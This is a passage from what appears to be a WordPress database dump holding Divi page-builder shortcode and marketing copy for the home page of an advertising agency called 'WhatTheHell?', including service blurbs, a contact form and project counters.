header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:51:55','2020-07-09 20:51:55','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(306,1,'2020-07-09 20:52:13','2020-07-09 20:52:13','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" 